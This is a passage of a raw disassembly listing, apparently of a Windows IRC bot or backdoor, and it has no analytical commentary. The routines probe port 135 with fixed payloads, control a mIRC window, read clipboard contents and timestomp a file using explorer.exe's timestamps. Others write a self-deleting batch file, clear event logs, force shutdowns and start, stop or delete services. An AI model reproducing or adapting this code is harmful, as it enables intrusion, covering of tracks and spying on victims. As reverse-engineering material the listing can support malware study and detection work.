; ---------------------------------------------------------------------------
loc_4182C9: ; CODE XREF: sub_418295+27�j
mov al, 1
jmp short loc_4182C5
sub_418295 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4182CD proc near ; CODE XREF: .text:0040DFD7�p
; .text:0040E0C0�p
var_2010 = dword ptr -2010h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 2010h
call __alloca_probe
mov eax, [ebp+arg_4]
push esi
dec eax
push edi
jz short loc_41830E
dec eax
jz short loc_4182EC
dec eax
loc_4182E6: ; CODE XREF: sub_4182CD+57�j
xor eax, eax
loc_4182E8: ; CODE XREF: sub_4182CD+3F�j
; sub_4182CD+169�j
pop edi
pop esi
leave
retn
; ---------------------------------------------------------------------------
loc_4182EC: ; CODE XREF: sub_4182CD+16�j
push 3
push 1388h
push [ebp+arg_0]
call dword_4CBA14 ; inet_addr
push eax
call sub_40C34B
add esp, 0Ch
neg eax
sbb eax, eax
and eax, 3
jmp short loc_4182E8
; ---------------------------------------------------------------------------
loc_41830E: ; CODE XREF: sub_4182CD+13�j
push 6
push 1
push 2
call dword_4CBA54 ; socket
mov esi, eax
or edi, 0FFFFFFFFh
cmp esi, edi
mov [ebp+arg_4], esi
jz short loc_4182E6
push ebx
xor ebx, ebx
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push 87h
call dword_4CB9D4 ; htons
push [ebp+arg_0]
mov [ebp+var_E], ax
call sub_40A8F0
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+Dst]
push 10h
push eax
push esi
call dword_4CB97C ; connect
cmp eax, edi
jz loc_41842A
push ebx
push 48h
push offset dword_439374
push esi
call dword_4CBA24 ; send
cmp eax, edi
jz loc_41842A
mov esi, 2000h
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_4CB9EC ; recv
cmp eax, edi
jz loc_41842A
cmp byte ptr [ebp+var_2010+2], 0Ch
jnz short loc_41842A
push ebx
push 18h
push offset dword_4393C0
push [ebp+arg_4]
call dword_4CBA24 ; send
cmp eax, edi
jz short loc_41842A
push ebx
lea eax, [ebp+var_2010]
push esi
push eax
push [ebp+arg_4]
call dword_4CB9EC ; recv
mov esi, eax
cmp esi, edi
jz short loc_41842A
cmp byte ptr [ebp+var_2010+2], 2
jnz short loc_41842A
push 10h ; Size
push offset dword_4393DC ; Buf2
lea eax, [ebp+var_2010]
push esi ; int
push eax ; int
call sub_418295
add esp, 10h
test al, al
jz short loc_41840A
cmp esi, 12Ch
setnl bl
inc ebx
jmp short loc_41842A
; ---------------------------------------------------------------------------
loc_41840A: ; CODE XREF: sub_4182CD+12F�j
push 10h ; Size
push offset dword_4393F0 ; Buf2
lea eax, [ebp+var_2010]
push esi ; int
push eax ; int
call sub_418295
add esp, 10h
neg al
sbb eax, eax
and eax, 3
mov ebx, eax
loc_41842A: ; CODE XREF: sub_4182CD+9B�j
; sub_4182CD+B2�j ...
push [ebp+arg_4]
call dword_4CBA6C ; closesocket
mov eax, ebx
pop ebx
jmp loc_4182E8
sub_4182CD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_41843B(char *Src,char *SubStr,char *Source)
sub_41843B proc near ; CODE XREF: sub_401ACD+BD0�p
; sub_401ACD+C0D�p ...
Src = dword ptr 8
SubStr = dword ptr 0Ch
Source = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+Src]
xor esi, esi
cmp edi, esi
jz short loc_4184C6
mov eax, [ebp+SubStr]
cmp eax, esi
jz short loc_4184C6
cmp [ebp+Source], esi
jz short loc_4184C6
cmp byte ptr [eax], 0
jz short loc_4184C6
push ebx
push edi ; Src
call __strdup
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_4184C1
push [ebp+SubStr] ; SubStr
push edi ; Str
call _strstr
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4184BA
sub eax, edi
push eax ; Count
push edi ; Source
push ebx ; Dest
call _strncpy
push [ebp+Source] ; Str
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call _strlen
push eax ; Count
push [ebp+Source] ; Source
push ebx ; Dest
call _strncat
push [ebp+SubStr] ; Str
call _strlen
add eax, esi
push eax ; Source
push ebx ; Dest
call _strcat
push ebx ; Source
push edi ; Dest
call _strcpy
add esp, 30h
mov esi, edi
loc_4184BA: ; CODE XREF: sub_41843B+3C�j
push ebx
call sub_41BA91
pop ecx
loc_4184C1: ; CODE XREF: sub_41843B+2B�j
mov eax, esi
pop ebx
jmp short loc_4184C8
; ---------------------------------------------------------------------------
loc_4184C6: ; CODE XREF: sub_41843B+C�j
; sub_41843B+13�j ...
xor eax, eax
loc_4184C8: ; CODE XREF: sub_41843B+89�j
pop edi
pop esi
pop ebp
retn
sub_41843B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4184CC(char *Str,int)
sub_4184CC proc near ; CODE XREF: sub_401955+E9�p
; sub_410BFD+F4�p
Dst = dword ptr -7D0h
var_7CC = byte ptr -7CCh
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
mov esi, [ebp+Str]
push esi ; Str
call _strlen
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_418502
or eax, 0FFFFFFFFh
jmp short loc_418575
; ---------------------------------------------------------------------------
loc_418502: ; CODE XREF: sub_4184CC+2F�j
xor ecx, ecx
mov [ebp+Dst], esi
test eax, eax
jle short loc_418524
loc_41850E: ; CODE XREF: sub_4184CC+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_41851B
cmp dl, 0Dh
jnz short loc_41851F
loc_41851B: ; CODE XREF: sub_4184CC+48�j
and byte ptr [ecx+esi], 0
loc_41851F: ; CODE XREF: sub_4184CC+4D�j
inc ecx
cmp ecx, eax
jl short loc_41850E
loc_418524: ; CODE XREF: sub_4184CC+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_418555
lea edi, [ebp+var_7CC]
loc_418531: ; CODE XREF: sub_4184CC+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_418550
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_418550
cmp ebx, 1F4h
jge short loc_418555
mov [edi], ecx
inc ebx
add edi, 4
loc_418550: ; CODE XREF: sub_4184CC+69�j
; sub_4184CC+74�j
inc edx
cmp edx, eax
jl short loc_418531
loc_418555: ; CODE XREF: sub_4184CC+5D�j
; sub_4184CC+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_418573
lea eax, [ebp+Dst]
push 7D0h ; Size
push eax ; Src
push [ebp+arg_4] ; Dst
call _memcpy
add esp, 0Ch
loc_418573: ; CODE XREF: sub_4184CC+8E�j
mov eax, ebx
loc_418575: ; CODE XREF: sub_4184CC+34�j
pop esi
pop ebx
leave
retn
sub_4184CC endp
; =============== S U B R O U T I N E =======================================
sub_418579 proc near ; CODE XREF: sub_4185D3+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_4185B2
push ebx
mov ebx, edi
loc_418596: ; CODE XREF: sub_418579+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_4185B5
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_418596
pop ebx
loc_4185B2: ; CODE XREF: sub_418579+18�j
pop edi
pop esi
retn
sub_418579 endp
; =============== S U B R O U T I N E =======================================
sub_4185B5 proc near ; CODE XREF: sub_418579+25�p
; sub_4185D3+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax ; C
call _tolower ; _tolower
cmp al, 61h
pop ecx
jl short loc_4185D0
cmp al, 7Ah
jg short loc_4185D0
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_4185D0: ; CODE XREF: sub_4185B5+E�j
; sub_4185B5+12�j
xor eax, eax
retn
sub_4185B5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4185D3(char *Str,int)
sub_4185D3 proc near ; CODE XREF: sub_415E19+10�p
; sub_415E4B+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
Str = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call __alloca_probe
push ebx
push esi
push edi
push [ebp+Str] ; Str
call _strlen
push [ebp+arg_4] ; Str
mov [ebp+var_4], eax
call _strlen
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_418579
add esp, 14h
dec esi
mov edi, esi
loc_418611: ; CODE XREF: sub_4185D3+B6�j
test esi, esi
jle short loc_41868F
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov ebx, eax
mov eax, [ebp+Str]
movsx eax, byte ptr [edi+eax]
push eax ; C
call _tolower ; _tolower
pop ecx
cmp eax, ebx
pop ecx
jz short loc_418687
loc_418637: ; CODE XREF: sub_4185D3+B2�j
mov ebx, [ebp+Str]
mov al, [edi+ebx]
push eax
call sub_4185B5
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_418658
mov eax, ecx
loc_418658: ; CODE XREF: sub_4185D3+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_41868B
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax ; C
call _tolower ; _tolower
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax ; C
mov [ebp+var_8], edx
call _tolower ; _tolower
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_418637
loc_418687: ; CODE XREF: sub_4185D3+62�j
dec edi
dec esi
jmp short loc_418611
; ---------------------------------------------------------------------------
loc_41868B: ; CODE XREF: sub_4185D3+8A�j
xor eax, eax
jmp short loc_418694
; ---------------------------------------------------------------------------
loc_41868F: ; CODE XREF: sub_4185D3+40�j
mov eax, [ebp+Str]
add eax, edi
loc_418694: ; CODE XREF: sub_4185D3+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_4185D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418699 proc near ; CODE XREF: sub_401ACD+66C5�p
; sub_401ACD+76FF�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_427094 ; RtlGetLastWin32Error
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_427164 ; FormatMessageA
lea eax, [ebp+var_100]
loc_4186D2: ; CODE XREF: sub_418699+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_4186DE
cmp cl, 9
jnz short loc_4186E1
loc_4186DE: ; CODE XREF: sub_418699+3E�j
inc eax
jmp short loc_4186D2
; ---------------------------------------------------------------------------
loc_4186E1: ; CODE XREF: sub_418699+43�j
; sub_418699+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_4186FB
mov cl, [eax]
cmp cl, 2Eh
jz short loc_4186E1
cmp cl, 21h
jl short loc_4186E1
loc_4186FB: ; CODE XREF: sub_418699+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset byte_4DB17C
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h ; Count
push esi ; Dest
call __snprintf
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_418699 endp
; =============== S U B R O U T I N E =======================================
sub_418723 proc near ; CODE XREF: sub_401ACD+2470�p
push esi
push 0
call dword_4CB9A4 ; OpenClipboard
test eax, eax
jz short loc_41875A
push 1
call dword_4CB9C4 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_41875A
push edi
push esi
call ds:dword_42716C ; GlobalLock
push esi
mov edi, eax
call ds:dword_427168 ; GlobalUnlock
call dword_4CBA28 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_41875A: ; CODE XREF: sub_418723+B�j
; sub_418723+19�j
xor eax, eax
pop esi
retn
sub_418723 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_41875E(char *Format)
sub_41875E proc near ; CODE XREF: sub_401ACD+74BF�p
Format = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
mov edi, offset aMirc_0 ; "mIRC"
push esi
push edi
call dword_4CB9E0 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_4187DA
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_427178 ; CreateFileMappingA
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:dword_427174 ; MapViewOfFile
push [esp+10h+Format] ; Format
mov ebx, eax
push ebx ; Dest
call _sprintf
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_4CBA30 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_4CBA30 ; SendMessageA
push ebx
call ds:dword_427170 ; UnmapViewOfFile
push edi
call ds:dword_427070 ; CloseHandle
push 1
pop eax
pop ebx
jmp short loc_4187DC
; ---------------------------------------------------------------------------
loc_4187DA: ; CODE XREF: sub_41875E+16�j
xor eax, eax
loc_4187DC: ; CODE XREF: sub_41875E+7A�j
pop edi
pop esi
pop ebp
retn
sub_41875E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4187E0 proc near ; CODE XREF: WinMain(x,x,x,x)+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_4CBA90 ; SearchPathA
test eax, eax
jz short loc_41887F
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:dword_4270F8
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_41887F
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_427180 ; GetFileTime
push ebx
mov ebx, ds:dword_427070
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_41887F
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_42717C ; SetFileTime
push esi
call ebx ; CloseHandle
loc_41887F: ; CODE XREF: sub_4187E0+2A�j
; sub_4187E0+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_4187E0 endp
; =============== S U B R O U T I N E =======================================
sub_418884 proc near ; CODE XREF: sub_401ACD+1682�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_419B9E
pop ecx
pop ecx
push 50005h
push 6
call dword_4CB914 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_418884 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4188A6 proc near ; CODE XREF: sub_401ACD+270E�p
; sub_4167A0+472�p
Str = byte ptr -764h
var_364 = byte ptr -364h
Dest = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
Dst = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_429090, esi
push edi
jz short loc_4188CA
cmp dword_4CBAA4, esi
jnz short loc_4188CA
push esi ; Str
call sub_401000
pop ecx
loc_4188CA: ; CODE XREF: sub_4188A6+13�j
; sub_4188A6+1B�j
call sub_40B583
lea eax, [ebp+Str]
push eax
push 400h
call ds:dword_4270B8 ; GetTempPathA
lea eax, [ebp+Str]
push eax
lea eax, [ebp+Dest]
push offset aSdel_bat ; "%sdel.bat"
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+Dest]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_4270F8 ; CreateFileA
mov edi, eax
cmp edi, esi
jbe loc_418A2A
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax ; Dest
call _sprintf
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+Str]
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call ds:dword_4270F0 ; WriteFile
push edi
call ds:dword_427070 ; CloseHandle
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_58]
pop edi
push edi ; Size
push esi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset byte_43DB88
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_4270A4 ; GetModuleHandleA
push eax
call ds:dword_427078 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_4270A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4189D2
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_42709C ; SetFileAttributesA
loc_4189D2: ; CODE XREF: sub_4188A6+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+Str]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+Str]
push eax
call ds:dword_427184 ; ExpandEnvironmentStringsA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_427074 ; CreateProcessA
loc_418A2A: ; CODE XREF: sub_4188A6+72�j
pop edi
pop esi
leave
retn
sub_4188A6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418A2E(int,char *Str,int,int,int)
sub_418A2E proc near ; CODE XREF: sub_401ACD+7133�p
Dest = byte ptr -294h
Dst = dword ptr -94h
var_84 = dword ptr -84h
arg_0 = dword ptr 8
Str = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 294h
push edi
xor edi, edi
push 94h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
mov [ebp+Dst], 94h
push eax
call ds:dword_4270D0 ; GetVersionExA
cmp [ebp+var_84], 2
jnz short loc_418AC4
push [ebp+arg_10]
push [ebp+arg_C]
call dword_4CB954 ; OpenEventLogA
push edi
push eax
call dword_4CB964 ; ClearEventLogA
test eax, eax
jz short loc_418AB6
push [ebp+arg_10]
push offset asc_4394FC ; "-"
loc_418A8F: ; CODE XREF: sub_418A2E+94�j
lea eax, [ebp+Dest]
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 20h
jmp short loc_418AEE
; ---------------------------------------------------------------------------
loc_418AB6: ; CODE XREF: sub_418A2E+57�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_4394D4
jmp short loc_418A8F
; ---------------------------------------------------------------------------
loc_418AC4: ; CODE XREF: sub_418A2E+3F�j
lea eax, [ebp+Dest]
push offset asc_4394A4 ; "-"
push eax ; Dest
call _sprintf
push edi ; int
lea eax, [ebp+Dest]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+Str] ; Str
push [ebp+arg_0] ; int
call sub_409869
add esp, 1Ch
loc_418AEE: ; CODE XREF: sub_418A2E+86�j
pop edi
leave
retn
sub_418A2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_418AF1(char *Source,int,int)
sub_418AF1 proc near ; CODE XREF: sub_401ACD+551C�p
Dest = word ptr -1C0h
var_15C = byte ptr -15Ch
Str = word ptr -0F8h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_84 = dword ptr -84h
Source = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1C0h
lea eax, [ebp+var_94]
mov [ebp+var_94], 94h
push eax
call ds:dword_4270D0 ; GetVersionExA
cmp [ebp+var_90], 4
jnz short loc_418B47
cmp [ebp+var_8C], 0
jnz short loc_418B30
push 1
pop eax
cmp [ebp+var_84], eax
jnz short loc_418B47
leave
retn
; ---------------------------------------------------------------------------
loc_418B30: ; CODE XREF: sub_418AF1+30�j
cmp [ebp+var_8C], 0Ah
jz short loc_418B42
cmp [ebp+var_8C], 5Ah
jnz short loc_418B47
loc_418B42: ; CODE XREF: sub_418AF1+46�j
push 1
pop eax
leave
retn
; ---------------------------------------------------------------------------
loc_418B47: ; CODE XREF: sub_418AF1+27�j
; sub_418AF1+3B�j ...
push esi
push edi
push offset aNetapi32_dll ; "netapi32.dll"
call ds:dword_4270C0 ; LoadLibraryA
mov esi, eax
push offset aNetmessagebuff ; "NetMessageBufferSend"
push esi
call ds:dword_4270C4 ; GetProcAddress
push 32h ; MaxCount
mov edi, eax
push [ebp+Source] ; Source
lea eax, [ebp+Dest]
push eax ; Dest
call _mbstowcs
push 32h ; MaxCount
lea eax, [ebp+var_15C]
push [ebp+arg_4] ; Source
push eax ; Dest
call _mbstowcs
push 32h ; MaxCount
lea eax, [ebp+Str]
push [ebp+arg_8] ; Source
push eax ; Dest
call _mbstowcs
lea eax, [ebp+Str]
push eax ; Str
call _wcslen
shl eax, 1
push eax
lea eax, [ebp+Str]
push eax
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+Dest]
push eax
push 0
call edi ; GetProcessHeap
add esp, 3Ch
mov edi, eax
push esi
call ds:dword_427144 ; FreeLibrary
mov eax, edi
pop edi
pop esi
leave
retn
sub_418AF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418BD1 proc near ; CODE XREF: sub_40111D+F7�p
; sub_40F0F1+A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
call ds:dword_4270B0 ; GetTickCount
push eax
call sub_41C2B8
pop ecx
call _rand
mov esi, [ebp+arg_0]
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
fild [ebp+var_4]
sub eax, esi
mov [ebp+arg_4], eax
fimul [ebp+arg_4]
fmul ds:dbl_4276E0
call __ftol
sub esi, eax
mov eax, esi
pop esi
leave
retn
sub_418BD1 endp
; =============== S U B R O U T I N E =======================================
sub_418C0E proc near ; CODE XREF: sub_401ACD:loc_406021�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_418C66
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_439520[esi]
push edi
push eax
call sub_418C88
add esp, 14h
test eax, eax
jnz short loc_418C56
push edi
push off_43951C[esi]
push offset asc_439630 ; "-"
loc_418C46: ; CODE XREF: sub_418C0E+56�j
mov esi, offset byte_4DBA40
push esi ; Dest
call _sprintf
add esp, 10h
jmp short loc_418C83
; ---------------------------------------------------------------------------
loc_418C56: ; CODE XREF: sub_418C0E+2A�j
push eax
call sub_418D2A
pop ecx
push eax
push edi
push offset unk_439604
jmp short loc_418C46
; ---------------------------------------------------------------------------
loc_418C66: ; CODE XREF: sub_418C0E+C�j
lea eax, [eax+eax*2]
mov esi, offset byte_4DBA40
push off_439518[eax*4]
push offset asc_4395E0 ; "-"
push esi ; Dest
call _sprintf
add esp, 0Ch
loc_418C83: ; CODE XREF: sub_418C0E+46�j
mov eax, esi
pop edi
pop esi
retn
sub_418C0E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418C88 proc near ; CODE XREF: sub_418C0E+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_4CB9C8 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_418CAF
call ds:dword_427094 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_418D24
; ---------------------------------------------------------------------------
loc_418CAF: ; CODE XREF: sub_418C88+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_4CB8B0 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_418CCF
call ds:dword_427094 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_418D1C
; ---------------------------------------------------------------------------
loc_418CCF: ; CODE XREF: sub_418C88+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_418D02
cmp eax, 3
jz short loc_418CF3
jle short loc_418D15
cmp eax, 6
jg short loc_418D15
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_4CB91C ; ControlService
jmp short loc_418D09
; ---------------------------------------------------------------------------
loc_418CF3: ; CODE XREF: sub_418C88+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_4CB8B8 ; StartServiceA
jmp short loc_418D09
; ---------------------------------------------------------------------------
loc_418D02: ; CODE XREF: sub_418C88+4D�j
push esi
call dword_4CB920 ; DeleteService
loc_418D09: ; CODE XREF: sub_418C88+69�j
; sub_418C88+78�j
test eax, eax
jnz short loc_418D15
call ds:dword_427094 ; RtlGetLastWin32Error
mov ebx, eax
loc_418D15: ; CODE XREF: sub_418C88+54�j
; sub_418C88+59�j ...
push esi
call dword_4CB8CC ; CloseServiceHandle
loc_418D1C: ; CODE XREF: sub_418C88+45�j
push edi
call dword_4CB8CC ; CloseServiceHandle
pop esi
loc_418D24: ; CODE XREF: sub_418C88+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_418C88 endp
; =============== S U B R O U T I N E =======================================
sub_418D2A proc near ; CODE XREF: sub_418C0E+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_418DDF
jz loc_418DD8
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_418DA2
jz short loc_418D98
mov ecx, eax
sub ecx, 3
jz short loc_418D8E
dec ecx
dec ecx
jz short loc_418D84
dec ecx
jz short loc_418D7A
sub ecx, 51h
jz short loc_418D70
sub ecx, 24h
jnz loc_418E55 ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D70: ; CODE XREF: sub_418D2A+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D7A: ; CODE XREF: sub_418D2A+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D84: ; CODE XREF: sub_418D2A+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D8E: ; CODE XREF: sub_418D2A+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418D98: ; CODE XREF: sub_418D2A+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418DA2: ; CODE XREF: sub_418D2A+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_418DD1
dec ecx
jz short loc_418DCA
dec ecx
jz short loc_418DC3
dec ecx
jnz loc_418E55 ; default
; jumptable 00418DFC cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_418E47
; ---------------------------------------------------------------------------
loc_418DC3: ; CODE XREF: sub_418D2A+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_418E47
; ---------------------------------------------------------------------------
loc_418DCA: ; CODE XREF: sub_418D2A+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_418E47
